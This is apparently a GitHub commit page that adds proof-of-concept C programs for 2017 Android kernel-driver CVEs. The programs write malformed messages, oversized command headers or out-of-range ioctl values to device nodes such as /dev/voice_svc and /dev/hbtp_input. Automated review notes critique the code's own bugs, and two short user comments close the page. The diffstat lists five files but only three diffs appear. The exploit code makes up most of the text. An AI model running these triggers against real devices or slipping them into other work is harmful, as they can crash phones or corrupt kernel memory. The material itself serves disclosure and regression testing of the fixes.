
CVE-2017-0451

CVE-2017-0504
CVE-2017-0516
CVE-2017-0518
CVE-2017-0519
CVE-2017-0521

Signed-off-by: Scott Bauer <sbauer@plzdonthack.me>
ScottyBauer committed Mar 18, 2017
1 parent 21d9ce8 commit a9e71a13034d283d9bf0fb909039e99285c6db89
Showing with 870 additions and 0 deletions.
  1. +33 −0 CVE-2017-0451.c
  2. +61 −0 CVE-2017-0504_mtk.c
  3. +63 −0 CVE-2017-0516.c
  4. +281 −0 CVE-2017-0518_0519.c
  5. +432 −0 CVE-2017-0521.c
@@ -0,0 +1,33 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+#define MSG_REGISTER 0x1
+#define MSG_REQUEST 0x2
+#define MSG_RESPONSE 0x3
+
+struct voice_svc_write_msg {
+ uint32_t msg_type;
+ uint8_t payload[0];
+};
+
+
+int main(void) {
+ int fd;
+ struct voice_svc_write_msg msg = { 0 };
+ msg.msg_type = MSG_REGISTER;
+ msg.payload[0] = 0xff;
+ fd = open("/dev/voice_svc", O_WRONLY);
+ if (fd > 0) {
+ write(fd, &msg, sizeof(msg));
+ }
+ else
+ printf("Error on /dev/voice_svc with %s\n", strerror(errno));
+
+ close(fd);
+ }
+
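Review bot: `msg.payload[0] = 0xff;` writes one byte past the end of `msg`, since `payload` is a zero-length array and `msg` is an ordinary stack object, so the program has undefined behaviour of its own before the driver is involved; the byte also lies outside the `sizeof(msg)` length passed to `write`. Either drop the line or add a comment saying why it is there. The descriptor test should be `if (fd >= 0)` with `close(fd);` moved inside that branch, because as written `close` also runs after a failed `open`. `strerror` and `errno` are used without `<string.h>` and `<errno.h>`, and the second file (CVE-2017-0504_mtk.c per the diffstat) has the same omission.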
@@ -0,0 +1,61 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+
+typedef uint8_t u8;
+typedef uint16_t u16;
+
+#pragma pack(1)
+typedef struct {
+ u8 wr; /* write read flag 0:R 1:W 2:PID 3: */
+ u8 flag; /* 0:no need flag/int 1: need flag 2:need int */
+ u8 flag_addr[2]; /* flag address */
+ u8 flag_val; /* flag val */
+ u8 flag_relation; /* flag_val:flag 0:not equal 1:equal 2:> 3:< */
+ u16 circle; /* polling cycle */
+ u8 times; /* plling times */
+ u8 retry; /* I2C retry times */
+ u16 delay; /* delay befor read or after write */
+ u16 data_len; /* data length */
+ u8 addr_len; /* address length */
+ u8 addr[2]; /* address */
+ u8 res[3]; /* reserved */
+ u8 *data; /* data pointer */
+} st_cmd_head;
+#pragma pack()
+
+
+
+int main(int argc, char **argv)
+{
+ st_cmd_head cmd_head = { 0 };
+ int fd;
+
+ if (argc < 2) {
+ printf("Please provide a location to the entry. "\
+ "it should start with the name 'gmnode' then a date "\
+ "After.\n");
+ return EXIT_FAILURE;
+ }
+
+ fd = open(argv[1], O_RDWR);
+
+ if (fd < 0) {
+ printf("Couldn't open %s with error %s\n", argv[1], strerror(errno));
+ return EXIT_FAILURE;
+ }
+
+ cmd_head.wr = 15;
+ cmd_head.data_len = 65534;
+
+ write(fd, &cmd_head, sizeof(cmd_head));
+
+ printf("Write completed? Probably should be rebooting now\n");
+ return EXIT_FAILURE;
+}
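Review bot: The result of `write` is discarded and `main` ends with `return EXIT_FAILURE;` on every path, so a run against a driver that rejects the request looks identical to one where it is accepted, and the file cannot serve as a regression check for the fix. Capture the result and report it, for example `ssize_t n = write(fd, &cmd_head, sizeof(cmd_head));` followed by `if (n < 0) printf("write failed: %s\n", strerror(errno));`, and let the exit status reflect that result. The `write` in the first file is unchecked in the same way. `cmd_head.wr = 15` falls outside the values listed in the struct's own field comment and `data_len = 65534` is unexplained, so both assignments need a comment stating what they are meant to exercise; `fd` is also never closed.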
@@ -0,0 +1,63 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdbool.h>
+#include <errno.h>
+#include <string.h>
+
+static const char *dev = "/dev/hbtp_input";
+
+struct hbtp_input_absinfo {
+ bool active;
+ uint16_t code;
+ int32_t minimum;
+ int32_t maximum;
+};
+
+
+#define HBTP_INPUT_IOCTL_BASE 'T'
+#define HBTP_SET_ABSPARAM _IOW(HBTP_INPUT_IOCTL_BASE, 201, \
+ struct hbtp_input_absinfo *)
+
+#define ABS_MT_TOUCH_MAJOR 0x30 /* Major axis of touching ellipse */
+#define ABS_MT_TOUCH_MINOR 0x31 /* Minor axis (omit if circular) */
+#define ABS_MT_TOOL_Y 0x3d /* Center Y tool position */
+
+#define ABS_MT_FIRST ABS_MT_TOUCH_MAJOR
+#define ABS_MT_LAST ABS_MT_TOOL_Y
+
+
+static int getfd(const char* dev_node)
+{
+ int fd;
+ fd = open(dev_node, O_RDWR);
+ if (fd < 0) {
+ fprintf(stderr, "Couldn't open devnode %s with error %s\n", dev_node, strerror(errno));
+ exit(EXIT_FAILURE);
+ }
+
+ return fd;
+}
+
+
+int main(void)
+{
+ int i;
+ struct hbtp_input_absinfo absinfo[ABS_MT_LAST - ABS_MT_FIRST + 1] = { 0 };
+ int fd = getfd(dev);
+
+ for (i = 0; i < ABS_MT_LAST - ABS_MT_FIRST + 1; i++) {
+ absinfo[i].active = 1;
+ absinfo[i].code = 0xFFFF - i;
+ absinfo[i].minimum = 0xAAAAAAAA;
+ absinfo[i].maximum = 0xAAAAAAAA;
+ }
+
+ while(true) {
+ ioctl(fd, HBTP_SET_ABSPARAM, absinfo);
+ }
+
+}
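Review bot: The `while(true)` loop around `ioctl` has no exit and ignores the call's result, so on a kernel that rejects the request the program spins at full CPU until it is killed and `main` never returns a status. Stop on the first error and report it with `if (ioctl(fd, HBTP_SET_ABSPARAM, absinfo) < 0) { perror("HBTP_SET_ABSPARAM"); break; }`, then `close(fd)` and return. `0xAAAAAAAA` does not fit in `int32_t`, so the assignments to `minimum` and `maximum` depend on implementation-defined conversion; an explicit `(int32_t)0xAAAAAAAAu` states the intent. The element count `ABS_MT_LAST - ABS_MT_FIRST + 1` is written out twice and would read better as one named constant.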

2 comments on commit a9e71a1


Josue198s Mar 20, 2017

Nice and clean code, but more comments are needed.


@omicr0


nice
